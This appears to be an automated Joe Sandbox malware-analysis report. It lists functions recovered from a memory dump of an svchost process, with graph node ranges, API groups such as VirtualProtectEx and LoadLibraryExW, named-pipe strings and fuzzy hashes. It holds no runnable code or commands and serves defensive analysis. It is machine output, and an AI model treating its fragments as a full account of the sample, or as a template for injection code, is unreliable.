                            control_flow_graph 836 1b8bff444f0-1b8bff4450a 837 1b8bff4473a-1b8bff4474b call 1b8bff483e0 836->837 838 1b8bff44510-1b8bff4452a GetModuleHandleW 836->838 840 1b8bff4452c-1b8bff44556 call 1b8bff54118 VirtualProtectEx 838->840 841 1b8bff44596-1b8bff445a5 838->841 840->841 848 1b8bff44558-1b8bff44590 call 1b8bff54118 VirtualProtectEx 840->848 844 1b8bff445ba-1b8bff445c1 841->844 845 1b8bff445a7-1b8bff445af TerminateThread 841->845 844->837 847 1b8bff445c7-1b8bff445f0 call 1b8bff469c0 GetCurrentThread call 1b8bff46ee0 844->847 845->844 855 1b8bff445f2-1b8bff445fe call 1b8bff46620 847->855 856 1b8bff44603-1b8bff44612 847->856 848->841 855->856 858 1b8bff44614-1b8bff44620 call 1b8bff46620 856->858 859 1b8bff44625-1b8bff44634 856->859 858->859 861 1b8bff44636-1b8bff44642 call 1b8bff46620 859->861 862 1b8bff44647-1b8bff44656 859->862 861->862 864 1b8bff44658-1b8bff44664 call 1b8bff46620 862->864 865 1b8bff44669-1b8bff44678 862->865 864->865 867 1b8bff4467a-1b8bff44686 call 1b8bff46620 865->867 868 1b8bff4468b-1b8bff4469a 865->868 867->868 870 1b8bff4469c-1b8bff446a8 call 1b8bff46620 868->870 871 1b8bff446ad-1b8bff446bc 868->871 870->871 873 1b8bff446be-1b8bff446ca call 1b8bff46620 871->873 874 1b8bff446cf-1b8bff446de 871->874 873->874 876 1b8bff446e0-1b8bff446ec call 1b8bff46620 874->876 877 1b8bff446f1-1b8bff44700 874->877 876->877 879 1b8bff44702-1b8bff4470e call 1b8bff46620 877->879 880 1b8bff44713-1b8bff44722 877->880 879->880 882 1b8bff44724-1b8bff44730 call 1b8bff46620 880->882 883 1b8bff44735 call 1b8bff46a30 880->883 882->883 883->837
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: b937edd41fe89e6200a7b9c78e6be1627db444eb7e017a4b0a9525fb1e2eb3b1
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 3361F531625B4291EF91FB28F6A17DA73A8FB44F44F542025A98E277A5EF3EC108C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF4A140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 886 1b8bff4a140-1b8bff4a17d 887 1b8bff4a26d 886->887 888 1b8bff4a183-1b8bff4a186 886->888 890 1b8bff4a26f-1b8bff4a28b 887->890 889 1b8bff4a18c 888->889 888->890 891 1b8bff4a18f 889->891 892 1b8bff4a265 891->892 893 1b8bff4a195-1b8bff4a1a3 891->893 892->887 894 1b8bff4a1a5-1b8bff4a1a8 893->894 895 1b8bff4a1b0-1b8bff4a1cf LoadLibraryExW 893->895 896 1b8bff4a1ae 894->896 897 1b8bff4a247-1b8bff4a256 GetProcAddress 894->897 898 1b8bff4a227-1b8bff4a23c 895->898 899 1b8bff4a1d1-1b8bff4a1da call 1b8bff54070 895->899 902 1b8bff4a21b-1b8bff4a222 896->902 897->892 901 1b8bff4a258-1b8bff4a263 897->901 898->897 900 1b8bff4a23e-1b8bff4a241 FreeLibrary 898->900 905 1b8bff4a1dc-1b8bff4a1f1 call 1b8bff4b838 899->905 906 1b8bff4a209-1b8bff4a213 899->906 900->897 901->890 902->891 905->906 909 1b8bff4a1f3-1b8bff4a207 LoadLibraryExW 905->909 906->902 909->898 909->906
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 6f73d6dcfb3615375baa24daab3803a4a75f3bc2b7400d15212ba5295ccf1c98
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 9631E132316B4281EE12BF27AA007D9B39CF758FA4F194125DD291B795EF7AC144D300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF42E38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: f5005cc2ea65ae7c61931ab92c97414a19f8c3f93b082654ee1533911d63e787
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 14319F727006429AEB14AF36D6903E8B77ABB48F84F944025CE0A67F94DF7AD955C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF427E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 1a69fd29da5c4f9a2ec6f1110c81e3249ffd3cd67aab0f28cecd040108f68699
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 6E31BF3660468682FB64BF35EA943ED7368FB40F84F544026CE0A63BA4DF3AD509D708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF5295C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 3a72b7ed54437a720ec44cb2ea935fa2f4f4e461725da61f96e90663b19d8ddc
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 6A11BF32710B4086E750AB62F954399B7A8F788FE4F104325EE1D87BA8CF39D818C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF419F0 Relevance: 10.3, APIs: 8, Instructions: 286stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: f129c3fc5f3b662ea668e09758b84b8f033844573d7d34b4ab39db878069e53c
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 0DC15C76711A0286EBA2EF2AD2817A973B9F798FC0F559116CB0953B50EF36D891C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF46A40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 1f5fc437b6f6b040f1c1f5e1f9ef48ded882a6a98814d20cddb07468d4b61540
                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 5ED1BA76208B8981DA70EB5AE59039AB7B4F3C8F88F504156EE8D57BA9DF3DC541CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF4ACFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: f1d255924cd9de6f150f5eaa9541634f8d809c18518ffb59a966a005f029fad3
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: 2DF08271711A4081FF44BF31E9953E97368EB48F45F452015A90B4A360DF2ED488C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF45FE0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: e57206d9fcccc70b07720b9a0e68ca42caeba63aaae8028bc7e406438b64ce84
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: EB02CC32219B8586EB60DB69F59039AB7B4F3C4B94F104015EA8E97BA9DF7DC444CF00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF5194C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: b17619c51a2d723de84ae150da3458008b5e72df293350c3a24b6ae6c818fbae
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 7F81DF32710A1099FB11BFB5CAA03ED37A8F744F98F445216DE0A53B96EF36A445C710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF46620 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: 9b987869a49914519cdeff562934dfb1584c993c188d3c71289ed5ab85880a73
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 1B610A32618B81C6E760EF65E65039AB7A8F388B44F100116FA8D97BA8DF7EC540CF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF22078 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: db4cdb93a7890c039f95340cbe20adbbc2898413306fad0270481d9de2bdf508
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: 57117332A58A4102F7687238F7563ED3348AB55B74F454634BF665BFE6CF2B8A81D100
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF52C78 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 7789d84716f6884de17b4313baa740627942af4b8a20b46fa79230296547007b
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 1111C272A50A4101F7643238E75A3E93749AB54B74F580724AF7B26FEBAF1BE851C210
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF1DD54 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: 3a784736c33743646cbbaf27caad2e1a7f7792e00d0f17f6e74a0644b38bcbf9
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: AC617A3260064482FAA8BB38A7903EF7BB9A794F85F144419FA4A177A5DF77CB41C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF19A10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: ea92bbebb3f69a50aed456c44c937607cc1ecbd232a5df6af0add1d9190539f2
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 5541DE7260078481EB35BB2296403FB7BA8E355FD4F584252FA99077E6CF2AC781C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF41000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105registryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValue
                            • String ID: d
                            • API String ID: 918324718-2564639436
                            • Opcode ID: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction ID: 57a6385722d53f893f33705b4f2bf82e5598bd759d0b585dc7b0c17cff349377
                            • Opcode Fuzzy Hash: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction Fuzzy Hash: 75415972208B8086E761DB21F98139FB3A9F3C9B80F544519EB9953B18DF39D465CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF516F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: 5579c5a5454cda3248de12dc7cb98da762c6a7dcd44174cbc07839beff5aa395
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 9541C032714A8082EB20AF39F9543EA77A8F798B84F844121EE4D87788EF3DE441C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF4C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 73b5c6d5c4e7a52a48ddfa72b9ee33fb79f12bdb05eb6c26e39e188af0965454
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: C2111736608B8086D764DB66F58029AB7A8F7C9BC0F544126EECD93B29CF39C454CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF49CE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: 3b5cb8bbcfdcd9e187096b07bd16b8b84a64393a13f471871762df021645d6d0
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: DC11F832614B8582EB219F25F540399B7A9F788F94F184221DFC917B64EF3AC551CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF4C7AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: 47b982454cf8a7bfd15413bf3e188b5b21d0983692a092236e39e49e020008cd
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: 63F0A735710B9092EB08BF61F6907D93368FB48FC0F485025D95927B65CF3AD485C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF4C758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 7ac1bd62ef79e3474dee08fbfb5f13e05748c7df1620033be10d7825011cecf7
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: 5EE0D87561064292FB187B70FB543E9332AAB88F80F8C5022D91907375CF3ED888C700
                            Uniqueness

                            Uniqueness Score: -1.00%